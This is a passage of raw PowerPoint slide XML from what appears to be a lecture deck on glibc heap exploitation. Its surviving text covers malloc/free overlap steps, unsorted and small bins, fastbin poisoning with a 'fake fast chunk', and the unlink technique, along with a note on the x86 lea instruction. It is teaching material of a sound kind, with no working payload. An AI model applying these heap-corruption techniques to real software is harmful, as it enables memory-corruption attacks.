          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7588450" y="1811850"/>
            <a:ext cx="4347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C'</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2428" name="Shape 24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example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2429" name="Shape 2429"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368075" y="1120825"/>
            <a:ext cx="2842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*A, *B, *C, *D;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free(C);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A = malloc(0x80 - 8);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free(B);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4864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0" name="Shape 2430"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="1648000"/>
            <a:ext cx="11115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 A'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31" name="Shape 2431"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="2220700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32" name="Shape 2432"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="2781625"/>
            <a:ext cx="11115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 C'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33" name="Shape 2433"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="3354325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34" name="Shape 2434"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58173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unsorted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435" name="Shape 2435"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7205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small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436" name="Shape 2436"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4428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sp>
        <p:nvSpPr>
          <p:cNvPr id="2437" name="Shape 2437"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6216850" y="1811850"/>
            <a:ext cx="4347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A'</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2438" name="Shape 2438"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3070925" y="3900900"/>
            <a:ext cx="626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(1/3)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Shape 2443"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7522750" y="2601825"/>
            <a:ext cx="4347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A'</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2444" name="Shape 24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example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2445" name="Shape 2445"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368075" y="1120825"/>
            <a:ext cx="2842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*A, *B, *C, *D;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free(C);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A = malloc(0x80 - 8);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free(B);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4864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6" name="Shape 2446"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="1648000"/>
            <a:ext cx="11115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 A'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47" name="Shape 2447"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="2220700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48" name="Shape 2448"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="2781625"/>
            <a:ext cx="11115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 C'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49" name="Shape 2449"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="3354325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50" name="Shape 2450"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58173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unsorted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451" name="Shape 2451"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7205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small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452" name="Shape 2452"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4428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sp>
        <p:nvSpPr>
          <p:cNvPr id="2453" name="Shape 2453"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7522750" y="1863100"/>
            <a:ext cx="4347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C'</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2454" name="Shape 2454"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3070925" y="3900900"/>
            <a:ext cx="626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(2/3)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Shape 2459"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6140650" y="1811850"/>
            <a:ext cx="4347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C'</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2460" name="Shape 2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example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2461" name="Shape 2461"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368075" y="1120825"/>
            <a:ext cx="2842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*A, *B, *C, *D;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free(C);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A = malloc(0x80 - 8);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free(B);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4864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2" name="Shape 2462"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="1648000"/>
            <a:ext cx="11115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 A'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63" name="Shape 2463"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="2220700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64" name="Shape 2464"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="2781625"/>
            <a:ext cx="1111500" cy="284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0x80</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2465" name="Shape 2465"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="3354325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66" name="Shape 2466"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58173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unsorted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467" name="Shape 2467"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7205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small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468" name="Shape 2468"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4428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sp>
        <p:nvSpPr>
          <p:cNvPr id="2469" name="Shape 2469"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7552825" y="1811850"/>
            <a:ext cx="4347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A'</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2470" name="Shape 2470"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="3067975"/>
            <a:ext cx="1111500" cy="28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Freed C'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0x80</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2471" name="Shape 2471"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3070925" y="3900900"/>
            <a:ext cx="626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(3/3)</a:t>
            </a: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Shape 2476"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6140650" y="1811850"/>
            <a:ext cx="4347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C'</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2477" name="Shape 24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example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2478" name="Shape 2478"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368075" y="1120825"/>
            <a:ext cx="2842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*A, *B, *C, *D;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free(C);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malloc(0x100 - 8);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 = malloc(0x80 - 8);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free(B);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4864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9" name="Shape 2479"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="1648000"/>
            <a:ext cx="1111500" cy="1133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 A'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0x200</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2480" name="Shape 2480"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="2781625"/>
            <a:ext cx="1111500" cy="284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0x80</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2481" name="Shape 2481"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="3354325"/>
            <a:ext cx="11115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482" name="Shape 2482"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58173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unsorted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483" name="Shape 2483"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7205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small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bins</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2484" name="Shape 2484"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4428800" y="1200575"/>
            <a:ext cx="106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sp>
        <p:nvSpPr>
          <p:cNvPr id="2485" name="Shape 2485"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6140650" y="2478525"/>
            <a:ext cx="4347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A'</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2486" name="Shape 2486"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407350" y="3067975"/>
            <a:ext cx="1111500" cy="28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Freed C'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0x80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 - Load Effective Address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lea &lt;reg32&gt;,&lt;mem&gt;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Examples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lea eax, [var] — register eax will be filled with addr specified by var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lea edi, [ebx+4*esi] — edi = ebx+4*esi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Sometimes compiler will use lea to do arithmetic operation, because it’s faster.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Shape 2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overflow exploitation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2492" name="Shape 24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Fastbin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Unlink</a:t>
            </a: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Shape 24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bin attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2498" name="Shape 2498"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2536800" y="1453975"/>
            <a:ext cx="1175400" cy="24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0x804b000</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2499" name="Shape 2499"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3712200" y="1453975"/>
            <a:ext cx="1175400" cy="24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0" name="Shape 2500"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4887600" y="1453975"/>
            <a:ext cx="1175400" cy="24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0x804b030</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2501" name="Shape 2501"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2426400" y="1967150"/>
            <a:ext cx="1396200" cy="1343700"/>
            <a:chOff x="1347625" y="2053825"/>
            <a:chExt cx="1396200" cy="1343700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2502" name="Shape 2502"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1347625" y="20538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prev_size</a:t>
              </a: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1347625" y="23031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size=16</a:t>
              </a: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1347625" y="25524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fd=NULL</a:t>
              </a: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1347625" y="28017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bk</a:t>
              </a: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1347625" y="3051025"/>
              <a:ext cx="1396200" cy="3465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unused</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2507" name="Shape 2507"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4777200" y="1967150"/>
            <a:ext cx="1396200" cy="1343700"/>
            <a:chOff x="3698425" y="2102425"/>
            <a:chExt cx="1396200" cy="1343700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2508" name="Shape 2508"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3698425" y="21024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prev_size</a:t>
              </a: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3698425" y="23517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size=32</a:t>
              </a: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3698425" y="26010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fd=fake addr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3698425" y="28503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bk</a:t>
              </a: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3698425" y="3099625"/>
              <a:ext cx="1396200" cy="3465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unused</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2513" name="Shape 2513"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2500" idx="2"/>
            <a:endCxn id="2508" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5475300" y="1703275"/>
            <a:ext cx="0" cy="2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14" name="Shape 2514"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4777200" y="3574725"/>
            <a:ext cx="1396200" cy="1343700"/>
            <a:chOff x="3698425" y="2102425"/>
            <a:chExt cx="1396200" cy="1343700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2515" name="Shape 2515"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3698425" y="21024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prev_size</a:t>
              </a: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3698425" y="23517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size=32</a:t>
              </a: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3698425" y="26010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fd=NULL</a:t>
              </a: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3698425" y="2850325"/>
              <a:ext cx="1396200" cy="249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bk</a:t>
              </a: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3698425" y="3099625"/>
              <a:ext cx="1396200" cy="3465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unused</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2520" name="Shape 2520"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2498" idx="2"/>
            <a:endCxn id="2502" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124500" y="1703275"/>
            <a:ext cx="0" cy="2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1" name="Shape 2521"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2510" idx="1"/>
            <a:endCxn id="2515" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4777200" y="2590400"/>
            <a:ext cx="600" cy="11091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2" name="Shape 2522"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6063000" y="1453975"/>
            <a:ext cx="1175400" cy="24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523" name="Shape 2523"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6174900" y="3574725"/>
            <a:ext cx="1175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0x804b010</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2524" name="Shape 2524"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1275875" y="1967150"/>
            <a:ext cx="10686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0x804b000</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2525" name="Shape 2525"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228654" y="1453975"/>
            <a:ext cx="22653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main_arena.fastbinsY</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2526" name="Shape 2526"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2397900" y="1111200"/>
            <a:ext cx="13962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size=16</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2527" name="Shape 2527"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3601800" y="1111200"/>
            <a:ext cx="13962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size=24</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2528" name="Shape 2528"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4777200" y="1111200"/>
            <a:ext cx="13962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size=32</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2529" name="Shape 2529"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7351800" y="2473100"/>
            <a:ext cx="1396200" cy="1343700"/>
            <a:chOff x="3698425" y="2102425"/>
            <a:chExt cx="1396200" cy="1343700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2530" name="Shape 2530"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3698425" y="2102425"/>
              <a:ext cx="1396200" cy="249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3698425" y="2351725"/>
              <a:ext cx="1396200" cy="2493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size=32</a:t>
              </a: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3698425" y="2601025"/>
              <a:ext cx="1396200" cy="8451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allocated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memory</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2533" name="Shape 2533"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4321850" y="2938400"/>
            <a:ext cx="413100" cy="413100"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">
            <a:avLst>
              <a:gd fmla="val 1011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4" name="Shape 2534"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2510" idx="3"/>
            <a:endCxn id="2530" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6173400" y="2590400"/>
            <a:ext cx="1178400" cy="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5" name="Shape 2535"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7515600" y="2032700"/>
            <a:ext cx="1068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fake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fast chunk</a:t>
            </a:r>
            <a:endParaRPr sz="120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Shape 25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Unlink</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2541" name="Shape 25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Chunk A or Chunk C is free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Free(chunk B)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Consolidate chunk A or chunk C with chunk B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Unlink chunk A or chunk B</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2542" name="Shape 2542"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4376625" y="1481425"/>
            <a:ext cx="1298700" cy="415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(free)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2543" name="Shape 2543"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5675325" y="1481425"/>
            <a:ext cx="1298700" cy="41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544" name="Shape 2544"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6974025" y="1481425"/>
            <a:ext cx="1298700" cy="415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(free)</a:t>
            </a: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Shape 25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Unlink</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2550" name="Shape 2550"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4493725" y="1940150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BK</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2551" name="Shape 2551"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4493725" y="2189150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BK-&gt;fd</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2552" name="Shape 2552"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4493725" y="2438150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BK-&gt;bk</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2553" name="Shape 2553"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6061850" y="1392350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2554" name="Shape 2554"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6061850" y="1641350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P-&gt;fd</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2555" name="Shape 2555"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6061850" y="1890350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P-&gt;bk</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2556" name="Shape 2556"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7565900" y="1890350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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2557" name="Shape 2557"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7565900" y="2139350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FD-&gt;fd</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2558" name="Shape 2558"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7565900" y="2388350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FD-&gt;bk</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2559" name="Shape 2559"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2555" idx="1"/>
            <a:endCxn id="2550" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5582150" y="2014850"/>
            <a:ext cx="479700" cy="49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0" name="Shape 2560"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="2556" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7150100" y="1765850"/>
            <a:ext cx="415800" cy="249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1" name="Shape 2561"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2551" idx="3"/>
            <a:endCxn id="2553" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5582125" y="1516850"/>
            <a:ext cx="479700" cy="796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2" name="Shape 2562"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2558" idx="1"/>
            <a:endCxn id="2553" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7150400" y="1516850"/>
            <a:ext cx="415500" cy="996000"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd fmla="val 4998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3" name="Shape 2563"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5831200" y="1254450"/>
            <a:ext cx="1551000" cy="18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Shape 2564"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7517250" y="2844163"/>
            <a:ext cx="1105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Unlink</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2565" name="Shape 2565"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4532300" y="360957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BK</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2566" name="Shape 2566"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4532300" y="3858575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BK-&gt;fd</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2567" name="Shape 2567"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4532300" y="4107575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BK-&gt;bk</a:t>
            </a:r>
            <a:endParaRPr/>
